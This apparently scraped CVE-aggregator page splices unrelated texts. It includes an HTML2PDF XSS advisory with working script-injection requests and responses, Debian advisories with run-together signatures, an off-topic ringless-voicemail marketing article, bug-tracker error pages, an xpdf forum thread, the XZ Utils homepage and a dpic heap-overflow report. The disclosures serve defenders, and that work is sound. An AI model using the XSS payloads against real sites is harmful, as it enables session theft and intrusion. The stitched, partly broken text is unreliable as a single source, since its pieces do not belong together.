Cross Site Scripting vulnerability in Spipu HTML2PDF before v.5.2.8 allows a remote attacker to execute arbitrary code via a crafted script to the forms.php.

**Spipu HTML2PDF vulnerable to cross-site scripting**

Moderate severity GitHub Reviewed Published Aug 28, 2023 to the GitHub Advisory Database • Updated Aug 29, 2023

GHSA-99fg-2h75-m92h: Spipu HTML2PDF vulnerable to cross-site scripting 

**CVE-2023-39062**

Spipu Html2Pdf < 5.2.8 - XSS vulnerabilities in example files.

**Timeline**

*   Vulnerability reported to vendor: 18.07.2023
*   New fixed 5.2.8 version released: 18.07.2023
*   Public disclosure: 23.08.2023

**Description**

Cross-Site-Scripting (XSS) vulnerability in Spipu Html2Pdf example files. This vulnerability allows an attacker to execute untrusted JavaScript code in the context of the currently logged-in user.

The vulnerability exists in any parameter that is passed to the example9.php and forms.php example files.

Example request to forms.php script:

    GET /html2pdf/examples/res/forms.php?test=abc"><script>alert(document.domain)</script> HTTP/1.1
    Host: example.afine.com
    Cookie: PHPSESSID=oiqo2oopiqt88teqgfb0a23vk0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0
    Accept-Language: pl,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: close
    

Server response:

    HTTP/1.1 200 OK
    Server: Apache
    Content-Length: 2215
    Connection: close
    Content-Type: text/html; charset=UTF-8
    
    [...]
    
    <page footer="form">
        <h1>Test de formulaire</h1><br>
        <br>
        <form action="http://example.afine.com:443/html2pdf/examples/res/forms.php?test=abc"><script>alert(document.domain)</script>">
            <input type="hidden" name="test" value="1">
    
    [...]
    

Example request to example9.php script:

    GET /html2pdf/examples/exemple09.php?test=/"><script>alert(document.domain)</script>abc/?nom=1 HTTP/1.1
    Host: example.afine.com
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: pl,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: close
    

Server response:

    HTTP/1.1 200 OK
    Date: Sat, 08 Jul 2023 18:32:51 GMT
    Server: Apache
    X-Powered-By: PHP/7.4.8
    Content-Length: 795
    Connection: close
    Content-Type: text/html; charset=UTF-8
    
    [...]
    
    <body>
    <br>
    Ceci est un exemple de génération de PDF via un bouton :)<br>
    <br>
    <img src="http://example.afine.com/html2pdf/examples/exemple09.php?test=/"><script>alert(document.domain)</script>abc/res/exemple09.png.php?px=5&amp;py=20" alt="image_php" ><br>
    <br>
    <br>
            <form method="get" action="">
    
    [...]
    

This issue was caused by a lack of sanitization of the provided request parameters. This problem has been fixed in Spipu Html2Pdf version 5.2.8.

**Affected versions**

< 5.2.8

**Advisory**

Update Spipu Html2Pdf to 5.2.8 or newer.

**References**

*   https://github.com/spipu/html2pdf/blob/92afd81823d62ad95eb9d034858311bb63aeb4ac/CHANGELOG.md
*   https://nvd.nist.gov/vuln/detail/CVE-2023-39062

CVE-2023-39062: GitHub - afine-com/CVE-2023-39062: Spipu Html2Pdf < 5.2.8 - XSS vulnerabilities in example files

Debian Linux Security Advisory 5484-1 - Zac Sims discovered a directory traversal in the URL decoder of librsvg, a SAX-based renderer library for SVG files, which could result in read of arbitrary files when processing a specially crafted SVG file with an include element.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5484-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoAugust 27, 2023                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : librsvgCVE ID         : CVE-2023-38633Debian Bug     : 1041810Zac Sims discovered a directory traversal in the URL decoder of librsvg,a SAX-based renderer library for SVG files, which could result in readof arbitrary files when processing a specially crafted SVG file with aninclude element.For the oldstable distribution (bullseye), this problem has been fixedin version 2.50.3+dfsg-1+deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 2.54.7+dfsg-1~deb12u1.We recommend that you upgrade your librsvg packages.For the detailed security status of librsvg please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/librsvgFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmTrXKhfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0TYkg//Q+FWCbAqpcLPI+InN0nga0wROM6JVxX3CVPTg6/4U0XKjPRmx4wlX6RvRPk1n4M8I7pjdtXT1PfdVsXpwT1+mFewUkOb4aLkuX5+0NOJbxAS6L6Oo1jNs4r0PJYPcda7edePoIScJ2vH14/yhJs+7ROV3hI0to5CpxT5KejGLTbkhWSs79YMvHxZBPLcSE/NDOCkDzlJ1aVBndmvgqQGujN7hvjynIi8IGEXrPAofqHO1pfVGtBWtK5oajXwxdAU2t0+wy4Lc0U2NPDF6r9QIeZidamJ0yfgPbuiU4WCx1lbkCAMG4Bf6m5S4JqbQmgc+rZCBHy3zaKlipFOEyPe2tfrcvH8zljRXSiKL5P0zMwVeYIRsQj3lUvPge+xV8Gqod99uv4fgN19OWvcP5HOiXxQnkRtReYiQgKut8W0HAXydCsrctAB2XvprYIbsnR1lU8dBAaLqnC/nwrsLVLUv7y1oKDDNjXmNT/aF/ISVF70WVywQK/LbhXIyECoGe+TeoxGjCjT+N/PibL3pMIZ/c8ZLMyH+2+Ad/oD614hPVbe7CUmRCX7Vz2ax8v47b4JY2skki9XdASkKsyvBq9Xus6ZY04D0tTj87wF0Vr4iBAbnFWSJnw2tFVLwn7/ncNkpU/MONR8CAPvhgBc8n/nfF9Fbg6ubEeAHdzlp8EOom8==uwUe-----END PGP SIGNATURE-----

Debian Security Advisory 5484-1

Debian Linux Security Advisory 5483-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5483-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffAugust 25, 2023                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-4427 CVE-2023-4428 CVE-2023-4429 CVE-2023-4430                  CVE-2023-4431Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the oldstable distribution (bullseye), these problems have been fixedin version 116.0.5845.110-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 116.0.5845.110-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmTo/EsACgkQEMKTtsN8TjZcVA//SJ88YLHY0KVBwr1CrQJPHHMeP5gyq80A/LRLf7kNco7jcHfZyiR8LB7V4eo62Um8dCpwzSHRqc73Jx580nn5tW310c3C7LQqVPOu0YBmslLkGstXQmR19mHSZkwGGukYMhoNw/ijfAceRjI2ivCnX1MrZyxb6cRH5vJ4Q0KDkSmCi0l2Luv5NHKYTQgprg4u9ls6OtTPu7BiyRClCJmoqrGvizfKSdVjwVdqrckRzZSmKagiXVpsnZacb8LnBluAyUkzPwC+f3Z9RZsDYzC2BeRn6qPhnRCM3C5LWxMAoypoP1Pv15rHz4qQa/pDFl6kiG1W9HD83UgrY0u32MmBgcCoI6c4nQ32Vk3Z+N+ZHO3kECm/Z7mGTLHXrHk4+jgXJV5TE1vnKNypKh7J6JewVFJxMg8Rw4gMRcod3zMNfBe1q9F39NbSRk0F/5LMfTOKZuZmLTuzX/wV3z6B6I1GoFQx7yw9w3vJ9095hdxWxGstedCSv4uinmPfoEzgCiQjRm828sO1Qzfnv+ukgMruhlFc15tbKdLJGu1mflu7AGURs5s1Q1RPMAZbTFcQ8zb7N/PXyiW2VKERuKRKI0+pjLGSoq7W9RU2Er7Mj9huq0T0xpjAkoR1L+nGXvENDNYNg3Yl4eMhHVnP0UzT37F3GEFEfmgAnlL1ziqypGjHvA0==/urs-----END PGP SIGNATURE-----

Debian Security Advisory 5483-1

By Owais Sultan
Ringless voicemail (RVM) is a technology that allows businesses to deliver pre-recorded messages directly to a customer's voicemail inbox without their phone ringing.
This is a post from HackRead.com Read the original post: Beyond Cold Calls: Ringless Voicemail As A Personalized Customer Engagement Tool

In the world of sales and marketing, cold calling (PDF) has long been a staple technique for acquiring new customers and generating leads. However, as the market becomes more saturated and sales teams try to reach customers across multiple channels, traditional cold calling has become less effective and frustrating for businesses and potential clients. For many, it’s time to move beyond cold calls and explore other options.

One such alternative that has gained popularity in recent years is ringless voicemail (RVM). This technology allows businesses to leave a message directly in a customer’s voicemail box without the phone ever ringing. With RVM, businesses can overcome some of the challenges and limitations of traditional cold calling, including time constraints, gatekeepers, and customer resistance. 

In this article, we’ll explore the benefits and use cases of RVM as a personalized customer engagement tool and examine why it’s becoming a standard practice in the sales and marketing landscape.

****What Is Ringless Voicemail (RVM)?****

Ringless voicemail (RVM) is a technology that allows businesses to deliver pre-recorded messages directly to a customer’s voicemail inbox without their phone ringing. Unlike traditional cold calls, RVM bypasses the need for a live conversation with the customer and instead delivers a personalized message that can be listened to at the customer’s convenience.

From a technical standpoint, when a business wants to send an RVM, a service provider calls the customer’s phone carrier and transfers the message payload directly into the voicemail system without causing the phone to ring. This technology leverages the voicemail infrastructure of cellular networks and serves as an efficient and effective means of reaching customers.

However, it’s important to note that the legality and regulations surrounding RVM vary by country and jurisdiction. In some regions, explicit consent from the recipient may be required, and there are specific guidelines on who can be contacted and for what purposes. Businesses utilizing RVM must familiarize themselves with the laws and regulations in their target markets to ensure compliance and maintain a positive reputation.

When comparing RVM to traditional voicemail drops, there is a clear distinction. Traditional voicemail drops involve manually dialling a phone number and leaving a live voice message when the call goes to voicemail. This method can be time-consuming and prone to errors. RVM, on the other hand, automates the process, allowing businesses to reach more customers quickly and efficiently.

Additionally, RVM provides the option to deliver a pre-recorded, polished message that can be carefully crafted and personalized for each recipient, maximizing the impact of the engagement. 

To know more about this, watch this brief video about RVMs:

**Advantages Of RVM Over Cold Calling**

In customer engagement, ringless voicemail (RVM) offers many advantages over traditional cold calling techniques. By leveraging RVM as a personalized customer engagement tool, businesses can reap the following benefits:

**Higher Engagement**: One of the key advantages of RVM is that it allows potential customers to listen to the message at their convenience. Unlike cold calling, which often interrupts busy schedules, meals, or important meetings, RVM allows customers to engage with the message when they have the time and inclination. This higher level of engagement increases the likelihood that the recipient will hear and consider the message.

**Less Intrusive**: Another advantage of RVM is that it is less intrusive than cold calling. Instead of interrupting people’s lives and demanding immediate attention, RVM respects their time. By delivering a voicemail directly to their inbox without their phone ever ringing, RVM allows customers to engage with the message on their terms, creating a more positive and less intrusive experience.

**Flexibility**: RVM allows businesses to tailor messages for specific demographics or target markets. Through RVM, businesses can create personalized and customized messages that resonate with their audience. Whether it’s adapting the tone, language, or content of the voicemail, RVM allows for a more targeted approach, increasing the effectiveness of the engagement and the chances of a positive response.

**Cost-effective**: Besides its convenience and effectiveness, RVM is also a cost-effective customer engagement tool. It often proves cheaper than traditional calling methods since it streamlines the process and eliminates the need for live customer conversations. With RVM, businesses can reach more potential customers in less time, thus maximizing their resources and ensuring a higher return on investment.

By capitalizing on the advantages of RVM over cold calling, businesses can enhance their customer engagement strategies and achieve higher levels of success in their sales and marketing efforts.

**Personalization With RVM**

Personalization is crucial in customer interactions in today’s competitive business landscape. It goes beyond the generic approach of mass communication. It aims to create tailored experiences that resonate with individuals more deeply. Ringless voicemail (RVM) offers businesses a unique opportunity to personalize customer engagement more meaningfully. Here are some tips for creating personalized RVMs:

**Segmenting your audience**: To effectively personalize your RVMs, start by segmenting your audience based on specific criteria such as demographics, behaviour, or preferences. By understanding your audience’s unique needs and interests, you can craft messages tailored to resonate with each segment. This segmentation allows you to deliver more targeted and relevant messages, increasing the likelihood of customer engagement.

**Crafting a compelling story or offer**: To capture your audience’s attention and create a personalized experience, crafting a compelling story or offer within your RVM is essential. Use storytelling techniques to make an emotional connection, address customer pain points, and demonstrate how your product or service can provide a solution. Focusing on the customer’s perspective and presenting a compelling value proposition can make your RVMs more engaging and persuasive.

**Including a clear call-to-action**: A clear and concise call-to-action is critical in any customer engagement strategy, including RVM. Communicate the next steps you want your customers to take, whether visiting a website, calling a specific number, or replying to the voicemail. Ensure the call-to-action is easy to understand and straightforward, guiding the recipient toward the desired outcome. This personalized prompt encourages immediate action and enhances the effectiveness of your RVM campaign.

**A/B testing different messages**: A/B testing is valuable for optimizing your RVM campaigns. Create variations of your messages, testing different approaches, content, and offers to see which performs best. You can identify what resonates most with your audience by comparing different messages’ responses and conversion rates. A/B testing allows you to refine and improve your RVMs continuously, resulting in more personalized and effective customer engagements.

You can create engaging and impactful customer interactions by prioritizing personalization in your RVM campaigns and implementing these tips. Personalization with RVM enhances customer experiences and increases the likelihood of achieving your marketing and sales goals.

**Best Practices For Using RVM As A Customer Engagement Tool**

As with any marketing or sales strategy, it’s important to follow best practices to ensure effective customer engagement and avoid potential issues. Here are some best practices for using RVM as a customer engagement tool:

**Respect Regulations**: Adhere to local and national telemarketing rules, including the National Do Not Call Registry in the United States and similar regulations in other countries. Failure to comply with these regulations can result in legal issues and damage your reputation.

**Be Brief and Clear**: Keep your RVM messages concise, clear, and concise. Respect the listener’s time by getting to the message quickly and delivering it articulately and engagingly. Avoid rambling or repeating your message, leading to disengagement and opt-outs.

**Offer Value**: Ensure that your RVM messages clearly benefit your recipients. Make it obvious that you’re providing something of value to them, whether it’s a special offer, exclusive content, or important information. Show your recipients that you care about their needs and that the RVM messaging is designed to help them.

**Opt-out Option**: Always provide a way for recipients to opt out of future messages. This demonstrates your respect for your customers’ privacy and preferences and helps reduce the likelihood of negative reviews or complaints. This can be as simple as including an option for recipients to unsubscribe from future messages or providing clear instructions for opting out.

**Frequency**: Be mindful of how often you reach out to your recipients through RVMs. Bombarding them with too many messages too frequently can be overwhelming and off-putting. Strike a balance between communicating consistently enough to stay top of mind but not so frequently as to become spammy. Always consider the value you deliver with each message, and ensure it’s worth the contact.

By following these best practices, businesses can use RVM as an effective and valuable customer engagement tool, enhancing customer relationships and driving growth in their operations.

**Potential Pitfalls And Concerns**

While ringless voicemail (RVM) can be a powerful tool for personalized customer engagement, it is important to know the potential pitfalls and concerns associated with its use. Here are some key considerations to keep in mind:

**Privacy concerns and public perception**: RVM operates within direct marketing, which can raise privacy concerns among consumers. Some individuals may view unsolicited voicemails as an intrusion into their personal space. Handling personal information responsibly and with the utmost respect for privacy is crucial. Be transparent about how you obtained recipient information and ensure that your messaging aligns with their expectations.

**Risks of spammy or excessive messaging**: One of the main challenges with RVM is avoiding the perception of spam or excessive messaging. Bombarding customers with too many voicemails without providing value can lead to frustration and negative brand perception. Strive for a balanced approach that delivers meaningful, personalized messages without overwhelming your audience. Optimize your RVM campaign by considering your communications’ appropriate frequency and relevance.

**Importance of targeting the right audience**: Targeting the right audience is crucial for the success of any customer engagement strategy, including RVM. Sending irrelevant messages to the wrong audience wastes resources and damages your campaign’s effectiveness. Take the time to segment your audience based on relevant criteria and tailor your RVMs to speak directly to their needs and interests. Increasing the relevancy of your communications enhances the likelihood of positive customer responses.

**Ensuring compliance with telemarketing laws**: Compliance with telemarketing laws and regulations is essential when using RVM. Different regions and countries may have specific rules and regulations for unsolicited communication. Familiarize yourself with and adhere to these laws, such as obtaining the necessary permissions or honouring do-not-call lists. Non-compliance can lead to legal issues, financial penalties, and detriment to your brand reputation.

By being mindful of these potential pitfalls and concerns, businesses can proactively mitigate risks and ensure a positive customer and brand experience. Adopting ethical practices, respecting privacy, and complying with relevant regulations are key to maintaining trust in your customer engagement efforts with RVM.

**The Future Of RVM And Customer Engagement**

Ringless voicemail (RVM) has proven to be a valuable tool for personalized customer engagement, and its potential continues to expand as technology advances. Here are some potential developments and predictions on the future of RVM and its role in customer engagement:

**Integration with other marketing strategies (e.g., SMS, email)**: RVM can be integrated with other marketing strategies such as SMS and email to create a multi-channel approach. By using RVM alongside other channels, businesses can maximize their reach and improve the effectiveness of their campaigns. Using an omnichannel strategy enables businesses to provide a seamless and consistent experience that customers increasingly expect.

**The role of AI and machine learning in automating and optimizing RVM**: With artificial intelligence (AI) and machine learning (ML), businesses can automate and optimize their RVM campaigns. Using data analysis to identify customer patterns and preferences, AI can help personalize RVM messages according to specific audiences and interests. Integration with other marketing channels can also enhance automation, making processes more efficient and effective.

**Predictions on the evolution of RVM as a communication tool**: As RVM evolves, it will likely become even more intelligent and interactive. There could be an increasing emphasis on the customization of RVMs, bringing customers even more relevance and personalization. Another possibility is that RVMs would allow direct engagement beyond just voicemail, with the ability to respond to customer feedback or inquiries via voice commands. Also, expansion into new territories may lead to new legal challenges and compliance considerations, especially as global data privacy laws become increasingly stringent.

With various advancements and changes on the horizon, RVM remains an exciting area for businesses to explore to engage their audience. Leveraging cutting-edge technologies alongside the best customer engagement and communication practices can lead to highly effective and innovative campaigns.

**Conclusion**

In the evolving customer engagement landscape, Ringless Voicemail (RVM) emerges as a potent tool, transcending the boundaries set by traditional cold calls. Its ability to offer a personalized touch while respecting the recipient’s time and space makes it an invaluable asset in the marketer’s toolkit.

As businesses strive to stay ahead of the curve, integrating RVM into one’s marketing arsenal could be the game-changing move they need. To all our readers, it’s time to reflect on your current strategies and ponder how RVM can be woven into your tapestry of customer outreach. The future of engagement beckons, and it might be ringless.

Beyond Cold Calls: Ringless Voicemail As A Personalized Customer Engagement Tool

A Use After Free vulnerability in svg_dev_text_span_as_paths_defs function in source/fitz/svg-device.c in Artifex Software MuPDF 1.16.0 allows remote attackers to cause a denial of service via opening of a crafted PDF file.

'701294?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2020-21896: Invalid Bug ID

An infinite recursion in Catalog::findDestInTree can cause denial of service for xpdf 4.02.

**Infinite loop in Catalog::findDestInTree**

Post Reply

*   Print view

Advanced search

3 posts • Page **1** of **1**

shellway

**Posts:** 16

**Joined:** Mon Jun 29, 2020 8:52 pm

**Infinite loop in Catalog::findDestInTree**

*   Quote

Post by **shellway** » Sun Jan 03, 2021 4:43 am

I find an infinite loop in Catalog::findDestInTree. To reproduce it, open poc with xpdf and click the hyperlink in it.

Attachments

poc.txt

(21.8 KiB) Downloaded 207 times

Top

shellway

**Posts:** 16

**Joined:** Mon Jun 29, 2020 8:52 pm

**Re: Infinite loop in Catalog::findDestInTree**

*   Quote

Post by **shellway** » Sun Jan 03, 2021 5:01 am

Sorry. It's not an infinite loop but infinite recursion which crashes xpdf.

Top

derekn

**Posts:** 936

**Joined:** Wed Apr 05, 2017 6:57 pm

**Re: Infinite loop in Catalog::findDestInTree**

*   Quote

Post by **derekn** » Mon Jan 04, 2021 9:01 pm

This is a known issue -- loops in the PDF object structure can cause problems for Xpdf.  
Xpdf 4 catches some of these cases, but not all of them. I'm working on a more robust loop detector for Xpdf 5.

Top

Post Reply

*   Print view

Display: Sort by: Direction:

3 posts • Page **1** of **1**

Return to “Xpdf open source”

Jump to

*   XpdfReader
*   Xpdf open source

CVE-2022-48545: Infinite loop in Catalog::findDestInTree - forum.xpdfreader.com

An issue discovered in XZ 5.2.5 allows attackers to cause a denial of service via decompression of crafted file.

XZ Utils is free general-purpose data compression software with a high compression ratio. XZ Utils were written for POSIX-like systems, but also work on some not-so-POSIX systems. XZ Utils are the successor to LZMA Utils.

The core of the XZ Utils compression code is based on LZMA SDK, but it has been modified quite a lot to be suitable for XZ Utils. The primary compression algorithm is currently LZMA2, which is used inside the .xz container format. With typical files, XZ Utils create 30 % smaller output than gzip and 15 % smaller output than bzip2.

XZ Utils consist of several components:

*   liblzma is a compression library with an API similar to that of zlib.
*   xz is a command line tool with syntax similar to that of gzip.
*   xzdec is a decompression-only tool smaller than the full-featured xz tool.
*   A set of shell scripts (xzgrep, xzdiff, etc.) have been adapted from gzip to ease viewing, grepping, and comparing compressed files.
*   Emulation of command line tools of LZMA Utils eases transition from LZMA Utils to XZ Utils.

While liblzma has a zlib-like API, liblzma doesn't include any file I/O functions. A separate I/O library is planned, which would abstract handling of .gz, .bz2, and .xz files with an easy to use API.

**Documentation**

Man page with a keyword index: xz(1)

Doxygen-generated liblzma API documentation is also included in the source packages since XZ Utils 5.4.2.

**Source code**

Versions 5.2.12, 5.4.3, and later have been signed with Jia Tan's OpenPGP key. The older files have been signed with Lasse Collin's OpenPGP key.

See the NEWS file for a summary of changes between versions.

**Stable**

5.4.4 was released on 2023-08-02. A minor bug fix release 5.2.12 to the old stable branch was made on 2023-05-04. This is probably the last release in the 5.2.x series.

XZ Utils releases are hosted on GitHub and thus some of the links below redirect to the XZ Utils release section on GitHub. Release files are also available in the XZ Utils files section on Sourceforge.

xz-5.4.4.tar.gz (2808 KiB) signature  
xz-5.4.4.tar.bz2 (2116 KiB) signature  
xz-5.4.4.tar.zst (1680 KiB) signature  
xz-5.4.4.tar.xz (1623 KiB) signature

Probably the last release of the old stable branch:

xz-5.2.12.tar.gz (2140 KiB) signature  
xz-5.2.12.tar.bz2 (1593 KiB) signature  
xz-5.2.12.tar.zst (1317 KiB) signature  
xz-5.2.12.tar.xz (1275 KiB) signature

**Development**

The new APIs, command line options etc. in development releases should be considered unstable. Incompatible changes to unstable features may be done before they get included in a stable release.

There currently are no development releases.

**Old versions**

Source and binary packages of old XZ Utils releases are available on a separate page.

**Git repository**

The primary repository is on GitHub:

git clone https://github.com/tukaani-project/xz

It is mirrored with some delay to git.tukaani.org:

git clone https://git.tukaani.org/xz.git

Gitweb

Branches:

*   **master**: the latest development code
*   **v5.4**: fixes for the next 5.4.x release
*   **v5.2**: fixes for the next 5.2.x release
*   **v5.0**: fixes for the next 5.0.x release (unmaintained)

Building the code from the git repository requires GNU Autotools. Here are the _minimum_ versions that should work with XZ Utils; using the latest versions is strongly recommended:

*   Autoconf 2.69
*   Automake 1.12
*   gettext 0.19.6 (Note: autopoint depends on cvs!)
*   Libtool 2.4

The following are optional dependencies. The autogen.sh script will fail if they are missing but autogen.sh takes command line arguments to disable these dependencies.

*   po4a is needed for translated documentation (man pages). To build without po4a, use --no-po4a with autogen.sh.
*   Doxygen is needed to generate liblzma API documentation. To build without Doxygen, use --no-doxygen with autogen.sh.

**Security issues****xzgrep CVE-2022-1271, ZDI-CAN-16587**

A patch to fix a security vulnerability in xzgrep (CVE-2022-1271, ZDI-CAN-16587) was made public on 2022-04-07. The patch applies to 4.999.9beta to 5.2.5, 5.3.1alpha, and 5.3.2alpha. Newer XZ Utils releases include an improved fix for the problem.

It is a severe issue if an attacker can control the filenames that are given on the xzgrep command line. The vulnerability was discovered by cleemy desu wayo working with Trend Micro Zero Day Initiative. For more information, see the detailed description in the patch file linked below.

xzgrep-ZDI-CAN-16587.patch  
xzgrep-ZDI-CAN-16587.patch.sig

**Bindings****Python**

Python 3.3 includes bindings for liblzma. A backport of these bindings are available for Python 2 in the backports.lzma package.

lzmaffi is another Python binding which adds random-access decompression support.

The original Python 2 binding for liblzma is PylibLZMA.

**Perl**

Perl bindings for liblzma: IO-Compress-Lzma and Compress-Raw-Lzma.

**Haskell**

Haskell bindings.

**Delphi and Free Pascal**

Bindings and example programs for Delphi and Free Pascal are available here.

**Pre-built binaries**

Many free software operating systems already provide easy-to-install XZ Utils binaries. It doesn't make sense to provide links to all those here. Instead, binaries or links to websites providing binaries are listed here only for operating systems that don't have well-known repositories where users would get software like this.

If you have a website that provides up-to-date XZ Utils binaries for an operating system that meets the the criteria above, let me know and I will include a link here. Note that I won't host the binaries themselves without a good reason.

**Windows**

The Windows version of XZ Utils includes binaries for 32-bit and 64-bit x86. The binaries only depend on msvcrt.dll, which is available on Windows 98 and later out of the box.

*   Command line tools: xz, xzdec, lzmadec, lzmainfo
*   Shared (DLL) and static liblzma, required C header files, and liblzma.def to create import libraries for non-GNU toolchains (no import library is needed with GNU toolchain)
*   Documentation is in plain text (UTF-8) format. The man pages of the command line tools are included also as PDF.

5.2.10, 5.2.11, or 5.2.12 do not have anything significant for Windows so only 5.2.9 is here. 5.4.x builds are not provided for now.

xz-5.2.9-windows.zip (1473 KiB) signature  
xz-5.2.9-windows.7z (708 KiB) signature

**DOS**

The DOS version of XZ Utils includes only the xz command line tool and some documentation. The xz tool should work e.g. on FreeDOS (also in DOSEMU), MS-DOS, and Windows 95/98/98SE/ME. This doesn't necessarily work in DOSBox at all, and at least some problems are expected under Windows XP Command Prompt (signal handling doesn't work).

Since the DOS version is naturally going to get very little testing, it is recommended to use the Windows version instead of the DOS version if you need xz under Windows 98 or later. It is likely that that the DOS version will be updated only occasionally.

5.2.0 and later have experimental support for 8.3 filenames. See xz-dos.txt in the binary package or dos/README.txt in the source package for details.

xz-5.4.0-dos.zip (277 KiB) signature

The package includes some copylefted code from DJGPP and CWSDPMI. The relevant source code is available from their home pages, and copies are also available below.

djlsr205.zip (2000 KiB)  
djtst205.zip (1061 KiB)  
csdpmi7s.zip (88 KiB)

Juan Manuel Guerrero has made a more complete port of XZ Utils to DOS. It also has support for short file names (8.3), but the naming method is different from the one found in 5.2.0 and later. It is available from DJGPP mirrors under /current/v2apps (e.g. xz-500b.zip for 5.0.0 binaries).

**Supported platforms**

Below is an incomplete and somewhat vague (version numbers mostly missing) list of operating systems on which XZ Utils should work. The compiler(s) or toolchains are mentioned in parenthesis. GCC refers to GCC 3 or later. If you have additions or corrections, please email them to me.

*   GNU/Linux (GCC, Clang, ICC, IBM XL C)
*   GNU/HURD (GCC)
*   DragonflyBSD (GCC)
*   FreeBSD (GCC, Clang)
*   MirBSD (GCC)
*   NetBSD (GCC)
*   OpenBSD (Clang, GCC)
*   MINIX 3 (GCC) \[1\]
*   Haiku (GCC4)
*   Mac OS X (GCC)
*   Solaris 8, 9, 10, 11 (GCC, Sun Studio) \[3\]
*   Solaris 2.6, 7 (GCC)
*   HP-UX (GCC, HP ANSI C) \[2\]
*   Tru64 (GCC, Compaq C compiler) \[1\]
*   IRIX (MIPSpro) \[1\]
*   AIX (GCC, IBM XL C)
*   z/OS (IBM XL C)
*   QNX (compilers?)
*   OpenVMS (HP C compiler) \[1\]
*   OpenVOS 17 (GCC)
*   SCO OpenServer 5.0.7 (GCC 3.4.6, 4.2.4) \[4\]
*   Windows 95 and later (GCC/MinGW, GCC/MinGW-w64, GCC/Cygwin, GCC/Interix, Visual Studio (VS can only build liblzma)) \[1\]
*   OS/2, eComStation (GCC)
*   DOS e.g. FreeDOS and MS-DOS (GCC/DJGPP) \[1\]

\[1\] See also the platform-specific notes in the INSTALL file.

\[2\] 2010-09-22: HP ANSI C compiler crashes when compiling XZ Utils on PA-RISC. On Itanium there are no problems.

\[3\] On Solaris 8 and 9 one may need to pass ac\_cv\_prog\_cc\_c99= to configure if using Sun Studio.

\[4\] Use --disable-threads when running configure.

**Licensing**

The most interesting parts of XZ Utils (e.g. liblzma) are in the public domain. You can do whatever you want with the public domain parts.

Some parts of XZ Utils (e.g. build system and some utilities) are under different free software licenses such as GNU LGPLv2.1, GNU GPLv2, or GNU GPLv3.

See the file COPYING for more details.

CVE-2020-22916: XZ Utils

A memory leak issue discovered in /pdf/pdf-font-add.c in Artifex Software MuPDF 1.17.0 allows attackers to obtain sensitive information.

'702566?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2020-26683: Invalid Bug ID

dpic 2021.04.10 has a Heap Buffer Overflow in themakevar() function in dpic.y

Skip to content

**Heap-based Buffer Overflow in the makevar() function**

Hi,

I found a **heap buffer overflow write of size 1** in the makevar() function, in dpic.y on dpic 2021.04.10 (commit: d317e406)

Heap buffer overflow issue: for loop in https://gitlab.com/aplevich/dpic/-/blob/master/dpic.y#L5769 as given below:

    void
    makevar(char *s, int ln, double varval)
    {
      nametype *vn, *lastvar, *namptr;
      int j, tstval;
      for (j = 0; j < ln; j++) { chbuf[chbufi + j] = s[j]; }
      ...

And, as per the code, https://gitlab.com/aplevich/dpic/-/blob/master/main.c#L1777

chbuf = malloc (sizeof (chbufarray)); if (chbuf==NULL){ fatal(9); } the sizeof chbufarray of char datatype is: https://gitlab.com/aplevich/dpic/-/blob/master/dpic.h#L78

    typedef Char chbufarray[CHBUFSIZ + 1];

and upper limit of chbuf buffers is CHBUFSIZ which is of 4095 limit so sizeof (chbufarray) becomes 4096 and while running the executable, the value of chbufi can be seen as 4089 for this test file, so it means any value which is greater than 6 will cause heap buffer overflow write in the makevar() function for loop, in this case.

    if ln (second input parameter of makevar()) is 7:
        chbuf[4089 + 6] = s[6];
        chbuf[4095] = s[6];
    
    if ln is greater than 7 like 8 or 9:
        chbuf[4089 + 7] = s[6];
        which is, chbuf[4096] = s[6]; // heap buffer overflow of write 1 byte

And, as per the code: https://gitlab.com/aplevich/dpic/-/blob/master/dpic.y#L5735 as given below, it can be seen as many makevar() function has second input parameter greater than 7

    void
    mkOptionVars(void)
    {
        makevar("dpicopt", 7, drawmode);
        if (safemode) { i = 1; } else { i = 0; }
        makevar("optsafe", 7, i);
        makevar("optMFpic", 8, MFpic);
        makevar("optMpost", 8, MPost);
        makevar("optPDF", 6, PDF);
        makevar("optPGF", 6, PGF);
        makevar("optPict2e", 9, Pict2e);
